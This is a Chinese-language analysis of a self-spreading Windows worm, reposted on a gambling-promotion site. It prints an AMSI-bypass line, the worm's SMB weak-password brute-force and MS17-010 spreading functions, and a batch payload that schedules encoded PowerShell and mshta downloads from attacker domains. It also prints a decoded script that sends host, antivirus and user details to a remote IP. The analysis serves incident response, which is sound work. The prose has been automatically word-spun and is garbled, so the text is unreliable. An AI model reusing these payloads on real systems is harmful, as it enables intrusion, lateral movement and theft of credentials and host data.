某紧急对应的样品分析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

某紧急对应的样品分析

申博_新闻事件 申博 236次浏览 已收录 0个评论

能够依照剖析的清算就行,不是很难,已悉数剖析完了,包孕当地文件和云端的局部样本。病毒不是很难,这病毒最牛逼的处所在于,自动化扫描进击。经由过程cmd开启65531 32 33端口,来标记该机械是不是已被沾染。

剖析该样本须要先看一下powershell反殽杂。地点是http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx,下载ppt进修一下就行

1. powershell作用。

封闭amis(防病毒接口) [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true),详细能够参考 https://www.anquanke.com/post/id/162924

Get-Win32Types函数的作用
    经由过程剖析可知,该函数的作用时经由过程powershell,手工组织一个pe文件。比方
${TYpEBUiLdER} = ${MOdULEbUIldEr}.DefineEnum(('SubSystemType'), ('Public'), [UInt16])
        ${tyPeBuiLDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_UNKNOWN'), [UInt16] 0) | Out-Null
        ${tYpEbUILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_NATIVE'), [UInt16] 1) | Out-Null
        ${TypeBuILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_GUI'), [UInt16] 2) | Out-Null
        ${TYpeBuildER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CUI'), [UInt16] 3) | Out-Null
        ${TYPebUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_POSIX_CUI'), [UInt16] 7) | Out-Null
        ${TYPeBUiLDER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI'), [UInt16] 9) | Out-Null
        ${TyPebuILdEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_APPLICATION'), [UInt16] 10) | Out-Null
        ${TyPEbUIlDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER'), [UInt16] 11) | Out-Null
        ${TypEBUiLdER}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER'), [UInt16] 12) | Out-Null
        ${tyPeBUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_ROM'), [UInt16] 13) | Out-Null
        ${TyPebuIlDer}.DefineLiteral(('IMAGE_SUBSYSTEM_XBOX'), [UInt16] 14) | Out-Null

详细能够参考 https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format,这里不在胪陈。

  • Get-Win32Constants 函数的作用,该函数的作用是设置适才组织的PE文件的值。

  • Get-Win32Functions函数 该函数作用是加载体系DLL中的函数,轻易powershell挪用体系函数

  • Sub-SignedIntAsUnsigned函数 该函数是将有标记的int相减,并将效果转换为无标记的int

  • Add-SignedIntAsUnsigned函数 该函数是将有标记的int相加,并将效果转换为无标记整数

  • Compare-Val1GreaterThanVal2AsUInt函数 对照两个整数是不是相称

  • Convert-UIntToInt函数 无标记整数转换有标记整数

  • Test-MemoryRangeValid函数 测试要求的内存地区是不是可用

  • Write-BytesToMemory函数 将bytes写入内存中

  • Get-ProcAddress 相当于直接挪用GetProcAddress 函数,检索指定的动态链接库(DLL)中的输出库函数地点

  • Enable-SeDebugPrivilege 启动给定历程的sedebug权限。该ps文件向内存开释mimikatz的pe可实行文件后,向这个被开释的线程开启sedebug权限,否则mimiakatz是没法运转的

  • Invoke-CreateRemoteThread 挪用其他历程的线程

其他一些函数,大多数是猎取PE文件头,倒入表 导出表的函数了

main函数很简朴,从第2644行最先。前几行重要作用是要实行甚么敕令。pebYtes64这个变量中存储的是mimikatz经由base64编码后的内容。随后推断一下computername,去离别实行中心功用REMOtEsCRiPTBlOCK的代码。这个我没看出来有甚么区别。

中心功用REMOtEsCRiPTBlOCK,的main函数在2468行。该函数的作用是向指定历程中注入mimikatz,然后在被注入的历程中实行mimikatz。推想小黑多是在网上找到的运用剧本,做了一下简朴的殽杂。能够看出殽杂只是将关键字改成字符串拼接或许大小写混用。没有实质性转变

该powershell的伤害:

  1. 经由过程mimikatz读取体系暗码和体系能够生存的私钥,轻易做横向挪动
  2. 网络体系信息

    除此之外,该powershell文件中开释的mimikatz没有落地,只在内存中运转,也没有留下后门等。

2. svchost2.exe

拖到IDA,发明这个exe的作用只是启动一个名叫Ddriver,然后挪用signed int sub_40E8F0这个函数

在这个函数中,起首挪用sub_40E3D0,然后挪用sub_40D280这个函数,写入一个C:\\windows\\temp\\ttt.exe这个文件
某紧急对应的样品分析

然后回到sub_40E3D0,实行cmd /c taskkill /f /im svhost.exe /im svhhost.exe /im svvhost.exe & move /y c:\\windows\\temp\\svvhost.exe c:\\windo" "ws\\temp\\svchost.exe & del c:\\windows\\system32\\svhhost.exe & del c:\\windows\\syswow64\\svhhost.exe

某紧急对应的样品分析

就是挪用taskkill干掉svhost,然后删除。而windows中准确的名字是svchost,有意是干掉竞争对手吧。随后将c:\\windows\\temp\\svvhost.exe挪动到 c:\\windo" "ws\\temp\\svchost.exe ,捏造svchost。这里引荐老哥想一下设施,修复就行。然后又经由过程wmic,删掉svhhost历程。

实行以下cmd cmd /c wmic process where \"ExecutablePath like '%%drivers%%' and name='taskmgr.exe'\" delete & wmic process where \"" "ExecutablePath like '%%drivers%%' and name='svchost.exe'\" delete & wmic process where \"ExecutablePath like '%%emp%" "%' and name='svchost.exe'\" delete

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

删除windows义务管理器,干掉可实行途径在driver和temp中的svchost,预计是为了更好的隐蔽病毒本体吧

实行以下cmd cmd /c netsh interface ipv6 install&netsh firewall add portopening tcp 65532 UDP&netsh interface portproxy add v4tov" "4 listenport=65532 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65531 UDP2&netsh interfa" "ce portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65" "533 ShareService

解释一下 起首装置ipv6,然后设置防火墙翻开udp 65532,然后设置v4tov4,也就是ipv4 署理 ,详细拜见 https://www.cnblogs.com/xbblogs/p/7118203.html

随后就是设置一些杂乱无章的器械。引荐老哥重点看一下C:\\windows\\system32中是不是有svhost这个文件,这个是病毒哈。

然后设置计划义务,代码贴出来,老哥依据这个删除就行 cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN %s /f&scht" "asks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN %s /tr \"cmd.exe /c %s\"&schtasks /run /TN %s

然后设置注册表,地位贴出来,老哥删除便可Software\\Microsoft\\Windows\\CurrentVersion\\Run,看一下在这个子目次中又没有可疑地key,应该是Driver。删除就行

回到 sub_40E8F0中,这里重若是启动义务啥的,看图,删除就行
某紧急对应的样品分析
scvhost2的伤害:

  1. 一大堆落地文件,修正注册表,计划义务,发起删除

3. svchost1 剖析

这个8MB的exe文件一看就不是大好人。先扔到IDA中,发明有python字样。检察string,发明py2exe。这就申明该exe有很大概率是运用python写成的,打包为exe。我们能够运用unpy2exe这个对象复原python代码,参考 https://github.com/matiasb/unpy2exe。然后复原PYC文件就行,
某紧急对应的样品分析

vi看一下复原的文件,实在就是一个python扫描MS17-010的剧本。

某紧急对应的样品分析

附件是复原事后的py文件,不许可上传py文件,以是我改成txt了,自行下载后后缀改成py就行

该py起首会绑定本机的60124端口。推想是做互斥体。体系中只能许可运转一个扫描对象。

代码从1090行最先,起首检测若是本机存在k8h3d这个用户,则删撤除。然后设想扫描计划义务,若是本机已被沾染,则读取当地病毒文件,若是没有被沾染,则从云端下载病毒代码,然后预备最先流传。

起首经由过程wmic ntdomain get domainname,检测一下是不是加域。若是加域的话,将域的用户名和暗码加入到破解口令列表中。这个列表中存储着罕见的弱口令

然后经由过程findip这个函数,猎取主机的ip,网段一类的信息。然后挪用scansmb这个函数,这个函数挪用scan2函数去检测目的是不是开放445。病毒会翻开65533端口,若是被扫描的机械翻开了65533端口,那就申明已被沾染。随后挪用validate这个函数

validate函数重要的作用是,经由过程弱口令暗码表,爆破SMB效劳。爆破胜利的话,将该扫描对象复制到被进击的机械上运转。

def validate(ip):
    for u in userlist2:
        for p in passlist:
            if u == '' and p != '':
                continue
            for d in domainlist:
                if PSEXEC(ee2, dl, 'cmd.exe /c c:\\windows\\temp\\svchost.exe', u, p, d).run(ip):
                    print 'SMB Succ!'
                    return

这是入侵的一种。第二种是经由过程findip猎取网段 ip信息后,挪用check_thread这个函数去打ms17-010。以是你会发明这段py代码实在就是python版ms17010的进击代码。

入侵胜利后,会在目的机械上实行smb_pwn函数中的代码。直接吧进击代码贴出来,人人就晓得怎样处理这个病毒了

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    if os.path.exists('c:/windows/system32/svhost.exe'):
        eb = 'c:\\windows\\system32\\svhost.exe'
    if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
        eb = 'c:\\windows\\SysWOW64\\svhost.exe'
    if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
        eb = 'c:\\windows\\system32\\drivers\\svchost.exe'
    if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
        eb = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
    service_exec(conn, 'cmd /c net share c$=c:')
    smb_send_file(smbConn, eb, 'c', '/installed.exe')
    if os.path.exists('c:/windows/temp/svvhost.exe'):
        ee = 'c:\\windows\\temp\\svvhost.exe'
    if os.path.exists('c:/windows/temp/svchost.exe'):
        ee = 'c:\\windows\\temp\\svchost.exe'
    smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')
    bat = 'cmd /c c:\\installed.exe&c:\\installed.exe&echo c:\\installed.exe >c:/windows/temp/p.bat&echo c:\\windows\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
    service_exec(conn, bat)

伤害:

1. 自动化扫描进击,主动进击局域网中其他的主机

下面说一下怎样消灭这个病毒:
本身看看smb_pwn函数中的代码,删除相干落地的文件就行

下面说一下云端代码,起首去http://v.beahh.com/v下载powershell代码,该代码经由gzinflate(base64_decode编码,以是写一段php解密,解密后的内容以下

.( $Env:COMSpEc[4,15,25]-jOIn'')( ((("{4}{28}{19}{23}{15}{46}{38}{27}{56}{47}{10}{62}{35}{29}{59}{16}{60}{0}{34}{55}{37}{13}{57}{52}{6}{50}{18}{61}{2}{36}{43}{45}{53}{22}{26}{31}{51}{1}{49}{21}{20}{54}{14}{7}{5}{40}{17}{58}{25}{30}{3}{39}{42}{24}{63}{11}{44}{8}{41}{32}{48}{12}{9}{33}" -f'JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv'))  -f  [ChAR]39,[ChAR]36) )

然后参考fireeye的一篇关于解说powershell殽杂的文章,写出以下py剧本解密

s = """JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv"""
s = s.split("','")

a  = ['4', '28', '19', '23', '15', '46', '38', '27', '56', '47', '10', '62', '35', '29', '59', '16', '60', '0', '34', '55', '37', '13', '57', '52', '6', '50', '18', '61', '2', '36', '43', '45', '53', '22', '26', '31', '51', '1', '49', '21', '20', '54', '14', '7', '5', '40', '17', '58', '25', '30', '3', '39', '42', '24', '63', '11', '44', '8','41', '32', '48', '12', '9', '33']
result = ""
for i in a:
    result += s[int(i)]

print result

效果是
Invoke-Expression {1}(New-Object IO.StreamReader ({1}(New-Object IO.Compression.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Convert]::FromBase64String({0}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvzN9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1pz/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P22z6S/B7Xhbnab66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk166qGf5dvaQPty6WRd2+5q+uqqf0+fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6ndJUpnV+WdSzp2k+LS7r/PV2m3++JXDu/R7Lqvnp8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09aS7/Ht5ZLdrf34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuVplY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9nXbQYz6alcX8ROj1mZkBQ4PdjTSgzjpkAE90+qBPRvR//YReMbxCnP1sltEHwoEdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwXILr168wx/lyO23w160YCWiGvLS1dV50pG1/5z7NzThvs9lqPfvpNf39CY8/bx9dLnMZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolcxR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTvyF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfELyRIhdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2gJ5qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm/w/yMTMPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ3oIFNKv2ydf/kuny3PxvkiW47vbJHxfNOCQT9XqDQYvE1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfnLdFtCgr2mq2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lta2sX8D7G85ra/OTrk/TLZ3dTSGC2aPMLYCC82uE44StBTr+id8Jv/S+/9/HW1p2Pf++PP/n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/XRUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={0})))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

然后我们继承解码,发明是以下内容

seT-VaRIablE  3oVYAr  ( " ) )93]Rahc[]GNIRTS[,)25]Rahc[+84]Rahc[+35]Rahc[((EcAlper.)'|','PwU'(EcAlper.)'$',)911]Rahc[+211]Rahc[+08]Rahc[((EcAlper.)29]Rahc[]GNIRTS[,)001]Rahc[+601]Rahc[+711]Rahc[((EcAlper.)43]Rahc[]GNIRTS[,'M4K'(EcAlper.)'
}{hctac}
elif epyt- htapwpP'+' metI-weN
{yrt
}{hctac}
}
)M4K2daoln'+'wod'+'wpPM4K(gnirtSdaolnwoD'+'.)tneilCbeW.teN tcejbO-weN( XEI
{esle}
)M4K3daolnwodwpPM4K(gnirtsdaolnwod.)tneilCbeW.teN tcejbO-'+'weN( XEI
yekwpP + eziswpP + M4K=ezis&M4K + sutatS.)sutatS ytreporP- troS PwU revirdD ecivreS-teG( + M4K3?nosj.wen/9.37.401.271//:ptthM4K = 3daolnwodwpP
)04*0001(peelS::]daerhT.gnidaerhT.metsyS[
;)pmt_daolnwodwpP(etucexellehs.cexewpP
;noitacilppa.llehs '+'moc- tcejbO-weN = cexewpP
mus.)mus- htgnel ytreporp- '+'tcejbO-erusaeM PwU esrucer- pmt_daolnwodwpP metIdlihC-teG( = eziswpP
)01*0001(peelS::]daerhT.gnidaerh'+'T.metsyS[
)M4Kpmt_daolnwodwpPM4K,M4Kdaolnwo'+'dwpPM4K(eliFda'+'olnwoD.)tneilCbeW.teN.metsyS'+' tcejbO-weN(
{)))htapwpP htap-tset( ton-( dna- )M4Kgninn'+'uRM4K en- s'+'utatS.)sutatS ytreporP- troS PwU revir'+'dD ecivreS-teG(((fi
{yrt
405exe.etadpudju405+M4Kpmet:vnewpPM4K = pmt_dao'+'lnwodwpP
yekwpP + M'+'4K3?'+'nosj.dlo/9.37.401.271//:ptthM4K '+'= 2daolnwodwpP
yekwpP + M4K3?exe.lld/9.37.401.271//:ptthM4K = daolnwodwpP
EM'+'ANRESU'+':vnewpP + M4K=resu&M4K + niamoD.)metsysretupmoc_23niw tc'+'ejbOimW-teG( +'+' '+'M4K=niamod&M4K + galfwpP + M4K=2galf&M4K + erutcetihcrASO.)metsySgnitarepO_23niW tcejbOimW-teG(+M4K=tib&M4K+noisrev.)metsySgn'+'itare'+'pO_23niW ssalC- tcejbOimW-teG(+'+'M4K'+'=rev&M4K+vawpP+M4K=va&M4K+camwpP+M4K=cam&M4K'+' = yekwpP
htapwpP htap-tset = ga'+'lfwpP]gnirts[
M4Kgol.ppdj'+'udjupmet:vnewpPM4K = htapwpP
}{hctac}
}
405YFDZ'+'405 =+ vawpP
{)M4Kgni'+'nnuRM4K qe- sutatS.)sutatS ytreporP- troS PwU uygnafgnoduhz eciv'+'reS-teG((fi
{yrt
}
svawpP = vawpP
{esle}
}
M4KP'+'wUM4K + ]vwpP[svawpP =+ vawpP
{)++vwpP ;tnuoC.svawpP tl- '+'vwpP ;0 = vwpP(rof
{)1- tg- )405tcejbO405(fOxednI.eman.)(epyTt'+'eG.svawpP(fi
emaNyalpsid.)tcudorPsuriVitnA ssalC- 2retneCytiruceSdjutoor ecapsemaN- tcejbOimW-teG( = svawpP
)CAM dn'+'apxe- tcejbo-tcelesPwUCAM redaeH- vsC-morFtrevnoC PwU1 tsrif- 1 pikS- tcejbO-tcel'+'eSPwUVSC OF/ c'+'amteg( = camwpP]gnirts[
M4KM4K = svawpP]gnirts'+'[
M4KM4K = vawpP]gnirts['(()'X'+]31[DILlEhs$+]1[DiLlEhs$ ( . " ); & ((gv '*mdR*').naMe[3,11,2]-joiN'') (-JOiN (  gEt-ItEm  VariABLe:3oVYAr  ).VaLUE[- 1 ..-((  gEt-ItEm  VariABLe:3oVYAr  ).VaLUE.lENgTh) ] )

重点看这里,我也看不懂,大抵意义是将字符串反转,OK,那我们试一下

效果以下

$av = ""
$avs = ""
$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
    $av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
}
}catch{}
$path = "$env:temp\\pp.log"
[string]$flag = test-path $path
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME
$download = "http://172.104.73.9/dll.exe?3" + $key
$download2 = "http://172.104.73.9/old.json?3" + $key
$download_tmp = "$env:temp"+'\update.exe'
try{
